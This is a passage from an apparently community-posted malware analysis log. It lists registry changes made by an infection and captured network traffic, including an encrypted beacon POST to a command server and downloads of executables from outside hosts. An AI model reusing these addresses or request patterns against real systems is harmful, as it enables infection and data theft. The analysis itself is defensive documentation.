38 4E 2B 76 37 63 45 4E 71 53 56 2F 4B 4C 52 35 66 33 37 56 51 4E 49 61 34 57 49 6D 35 33 2F 6C 59 42 78 71 6D 70 35 76 31 74 46 32 78 30 78 6D 53 46 47 45 33 52 31 77 4A 47 35 36 7A 64 32 41 4B 35 37 68 39 38 65 4C 39 36 33 72 79 4E 6B 52 4B 68 4E 61 30 6B 55 7A 4E 30 45 75 67 41 2B 56 43 55 52 74 2F 6E 4B 36 45 2F 62 51 70 45 2B 4F 6E 66 4D 37 61 2F 47 66 4F 2F 76 65 51 51 4B 78 61 46 30 62 73 69 77 7A 47 6F 78 4B 38 53 50 2F 43 54 56 2F 55 52 61 37 58 2F 42 49 63 43 43 6B 6D 5A 41 6B 4A 38 65 35 50 62 2B 54 55 72 4B 79 68 42 47 56 33 4B 6A 44 41 62 54 42 42 59 63 68 4C 6B 6F 78 30 48 2F 4C 65 38 58 59 34 77 39 73 63 35 68 47 68 67 78 6D 4A 55 74 69 6C 50 57 6D 45 58 74 59 62 57 44 74 42 2B 4B 36 74 45 45 62 35 58 52 30 33 51 38 4E 46 32 50 39 51 52 4E 75 6A 57 44 6F 77 46 43 38 56 2B 57 50 4A 32 68 64 44 57 63 50 58 48 6B 4E 56 4D 6F 78 2F 6E 54 65 41 64 58 44 34 78 45 53 76 55 57 2B 67 59 51 45 4A 77 38 38 42 56 39 55 33 55 71 6F 58 50 41 46 34 37 4A 6D 6E 63 6B 38 49 65 79 64 6D 65 51 31 48 6C 70 75 45 2F 6C 4D 37 2B 41 44 31 36 78 4D 69 59 46 53 61 48 62 67 4B 5A 48 71 6A 32 67 4A 53 2B 77 67 38 62 4C 56 2B 78 6F 4C 4F 6E 59 38 54 41 41 6C 79 50 6A 4C 7A 77 50 6E 69 67 6B 50 39 75 6B 59 4C 52 43 79 6F 2F 51 45 2F 57 78 31 30 79 47 69 2B 63 52 45 47 49 78 48 73 38 33 57 7A 77 67 76 42 56 68 45 54 43 66 59 61 4A 30 33 45 63 51 73 52 72 67 6F 43 76 47 75 39 51 49 55 57 43 52 59 35 31 6B 6B 6E 65 6F 39 31 5A 45 77 70 4D 36 64 4F 48 50 4C 45 76 54 2F 4A 70 4F 74 68 65 30 62 73 35 47 4D 74 36 49 6D 44 4C 77 31 79 54 75 47 59 53 32 50 64 70 55 4B 61 47 39 55 73 64 68 58 4E 2F 2F 6E 75 49 35 79 6E 73 62 48 4E 4F 50 42 32 7A 41 68 77 6C 36 32 51 51 2F 72 67 49 54 6E 69 74 65 2F 71 63 79 37 6E 34 58 51 46 62 6B 6B 6A 54 7A 66 59 36 52 2B 71 6E 69 49 31 34 66 55 4B 4A 61 77 3D 3D
  1520. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F
  1521.  
  1522. ----------------------------------
  1523. Values modified:23
  1524. ----------------------------------
  1525. HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
  1526. HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
  1527. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
  1528. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
  1529. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
  1530. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
  1531. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
  1532. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
  1533. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
  1534. HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
  1535. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
  1536. HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
  1537. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
  1538. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
  1539. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
  1540. HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
  1541. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
  1542. HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
  1543. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
  1544. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
  1545. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
  1546. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
  1547. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
  1548. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
  1549. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
  1550. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
  1551. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
  1552. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
  1553. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
  1554. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
  1555. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
  1556. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
  1557. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
  1558. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
  1559. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
  1560. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
  1561. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
  1562. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
  1563. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
  1564. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
  1565. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
  1566. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
  1567. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
  1568. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
  1569. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
  1570. HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006
  1571.  
  1572.  
  1573. ==============================================
  1574. EVIL NETWORK CONNECTIVITIES..............
  1575. ==============================================
  1576.  
  1577.  
  1578. (1)POST /forum/viewtopic.php HTTP/1.0
  1579. Host: 108.178.59.34
  1580. Accept: */*
  1581. Accept-Encoding: identity, *;q=0
  1582. Content-Length: 255
  1583. Connection: close
  1584. Content-Type: application/octet-stream
  1585. Content-Encoding: binary
  1586. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1587. CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
  1588. ..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
  1589. ..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
  1590. ...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
  1591. =C.f..<.\......B.*HTTP/1.1 200 OK
  1592.  
  1593. Server: nginx/0.7.67
  1594. Date: Wed, 17 Oct 2012 04:17:15 GMT
  1595. Content-Type: text/html
  1596. Connection: close
  1597. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  1598.  
  1599. -----------
  1600. (2)GET /Z2U.exe HTTP/1.0
  1601. Host: 3073.a.hostable.me
  1602. Accept: */*
  1603. Accept-Encoding: identity, *;q=0
  1604. Connection: close
  1605. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1606.  
  1607. HTTP/1.1 200 OK
  1608. Date: Wed, 17 Oct 2012 04:13:17 GMT
  1609. Server: Apache
  1610. Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
  1611. Accept-Ranges: bytes
  1612. Content-Length: 407128
  1613. Connection: close
  1614. Content-Type: application/x-msdownload
  1615. MZ......................@..........................................
  1616. .....!..L.!This program cannot be run in DOS mode.
  1617. $.......PE..L...
  1618.  
  1619.  
  1620. ----------------------------------------
  1621.  
  1622. (3)GET /PNV3Hbi.exe HTTP/1.0
  1623. Host: 85.18.21.252
  1624. Accept: */*
  1625. Accept-Encoding: identity, *;q=0
  1626. Connection: close
  1627. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  1628.  
  1629.  
  1630. HTTP/1.1 200 OK
  1631. Date: Wed, 17 Oct 2012 04:09:24 GMT
  1632. Server: Apache/2.2.22 (Debian)
  1633. Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
  1634. ETag: "242fca-63658-4cc3963d6a094"
  1635. Accept-Ranges: bytes
  1636. Content-Length: 407128
  1637. Connection: close
  1638. Content-Type: application/x-msdos-program
  1639. MZ......................@...............................................!
  1640. This program cannot be run in DOS mode.$.......PE..L....(~P..............
  1641. .Z....................@.......................... ......................
  1642. ......................................................................U..
  1643. ..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
  1644. .E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".
  1645.  
  1646.  
  1647. #MalwareMustDie!!!!!!!!!
Advertisement
RAW Paste Data Copied
Advertisement